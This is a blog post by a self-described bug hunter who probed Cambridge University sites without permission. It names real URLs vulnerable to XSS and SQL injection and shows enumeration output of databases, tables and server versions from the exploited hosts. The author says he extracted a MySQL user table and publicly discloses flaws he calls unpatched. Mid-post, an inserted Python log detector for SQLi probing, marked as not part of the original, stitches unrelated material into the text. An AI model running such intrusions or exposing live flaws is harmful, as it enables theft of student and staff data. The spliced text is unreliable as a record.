Cambridge University and their glaring vulnerabilities they refuse to patch.

About a month ago I decided to audit Cambridge University. I was hoping to find some web app vulnerabilities which I could then report to get a bounty of some kind. I did a very basic audit, testing for Cross-Site Scripting (XSS), Local File Inclusion (LFI) and some other vulnerabilities such as SQL Injection (SQLi). What I discovered for such a reputable University is crazy, and the fact they won’t even respond to emails clearly implies they do not care whatsoever.

The first page I tested for XSS was their library page at http://www.lib.cam.ac.uk/

Yes, you guessed it. Vulnerable.

PoC:


The second page I tested was http://webapps.fitzmuseum.cam.ac.uk

…and of course XSS yet again

Here’s my openbugbounty submission report: https://www.openbugbounty.org/reports/280729/

PoC:


I also looked for other things like their robots.txt file which can be found at http://www.lib.cam.ac.uk/robots.txt

I decided to stop looking for XSS on Cambridge as this site is just littered with them. Can’t really do much either as they are non-persistent (this doesn’t mean they shouldn’t be patched).

So to sum up the rest of this post…


Ok… now let’s get straight to the more serious vulnerabilities which they should most definitely have patched by now, but unfortunately they can’t even respond to emails. They also don’t seem to care at all, as stated previously.

I will however post proof that these vulnerabilities can be exploited and that they are very SERIOUS.

The first SQLi vulnerability appears to be error-based:

The database appears to have 20 columns from testing:

The attacker can now find the vulnerable columns and continue exploiting to get the database names/tables and then extract the data from them.
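As an added defender-side example (not part of the original post and not code from Cambridge's systems): a small Python detector that looks for the column-count probing (ORDER BY n, UNION SELECT with NULL placeholders) and information_schema enumeration described above in Apache access-log lines, and scores each client so a burst of such requests stands out. The log lines, paths and client addresses are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Apache common/combined log line (the host above runs Apache 2.4): client, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the probing the post describes: counting columns with ORDER BY n,
# UNION SELECT with NULL placeholders, and walking information_schema for table names.
SQLI_PATTERNS = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_probe": re.compile(r"\bunion\b[\s/*]+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
}

# Constructed sample log lines (not from the target); 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2017:10:00:01 +0000] "GET /search.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2017:10:00:02 +0000] "GET /search.php?id=1%20order%20by%2020 HTTP/1.1" 200 311',
    '203.0.113.7 - - [01/Jan/2017:10:00:03 +0000] "GET /search.php?id=1%20order%20by%2021 HTTP/1.1" 500 211',
    '203.0.113.7 - - [01/Jan/2017:10:00:04 +0000] "GET /search.php?id=-1%20union%20select%20null,null HTTP/1.1" 200 611',
    '203.0.113.7 - - [01/Jan/2017:10:00:05 +0000] "GET /search.php?id=-1%20union%20select%20table_name,null%20from%20information_schema.tables HTTP/1.1" 200 900',
    '198.51.100.5 - - [01/Jan/2017:10:00:06 +0000] "GET /news.php?id=42 HTTP/1.1" 200 2048',
]

def decode_path(path):
    """Decode URL encoding twice so %2520-style double encoding cannot hide a probe."""
    return unquote_plus(unquote_plus(path))

def classify(line):
    """Parse one log line; return (ip, status, [matched signature names]) or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_path(m.group("path"))
    hits = [name for name, rx in SQLI_PATTERNS.items() if rx.search(decoded)]
    return m.group("ip"), int(m.group("status")), hits

def flag_sources(lines, threshold=3):
    """Score clients: one point per matched signature, one extra per 5xx (error-based probing); return those >= threshold."""
    scores = {}
    for line in lines:
        parsed = classify(line)
        if not parsed or not parsed[2]:
            continue
        ip, status, hits = parsed
        scores[ip] = scores.get(ip, 0) + len(hits) + (1 if status >= 500 else 0)
    return {ip: s for ip, s in scores.items() if s >= threshold}
```

Run `flag_sources(SAMPLE_LOG)` to get `{'203.0.113.7': 6}`; the 500 on the ORDER BY 21 request is what the "20 columns" probe in the post would leave behind in the server log.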


web server operating system: Linux Debian 8.0 (jessie)
Apache 2.4.10
MySQL >= 5.0
databases[6]
[*] generate
[*] images
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


Database: mysql
[24 tables]

And here is the data extracted from the user table in the [mysql] database. I decided to format it using Excel:


Data can be extracted from any one of those databases. If a malicious attacker were to extract info from a different table within the database, they could get students’ private information, staff information and even private research material stored in the MySQL database.


I will now move on to the second SQLi vulnerability. This one is on the admin sub-domain of Cambridge; it has one database and over 400 tables.

Database: *
[424 tables]

I don’t really want to drag this on, so I will move straight on to the last SQLi vulnerability:

And yes, again, this can be exploited.


Database: information_schema
[40 tables]

So the message here is simple: get your sh*t patched and stop compromising student/staff data!

I wrote this up pretty quick and only decided to include database names & tables as I don’t want to compromise Cambridge any more than they already are.


Hope you enjoyed this lil writeup :)